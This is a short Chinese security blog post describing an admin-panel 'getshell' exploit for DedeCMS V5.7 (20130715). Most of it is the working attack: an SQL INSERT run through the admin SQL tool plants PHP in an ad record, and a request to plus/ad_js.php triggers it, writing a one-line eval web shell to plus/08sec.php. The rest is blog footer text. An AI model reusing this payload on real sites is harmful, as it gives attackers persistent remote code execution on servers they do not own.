Dede后台getshell【过20130715】

测试版本为:V5.7 20130715

测试步骤:
后台——SQL命令运器——执行命令

INSERT INTO `dede_myad` (`aid`, `clsid`, `typeid`, `tagname`, `adname`, `timeset`, `starttime`, `endtime`, `normbody`, `expbody`) VALUES
(2000, 0, 0, 'indexTopBanner1', '首页顶部导航大图-500*60', 0, 1297933028, 1300525028, '<?php file_put_contents(''08sec.php'',''<?php eval($_POST[08]);?>''); ?>', '');

0131022140137

访问:http://site/plus/ad_js.php?aid=2000 (id请自行更换)

文件生成在:site/plus/08sec.php

20131022135449

本文固定链接: https://www.unhonker.com/bug/1432.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2013年10月22日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Dede后台getshell【过20130715】 | 90' s Blog|关注网络信息安全
关键字:

Dede后台getshell【过20130715】:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!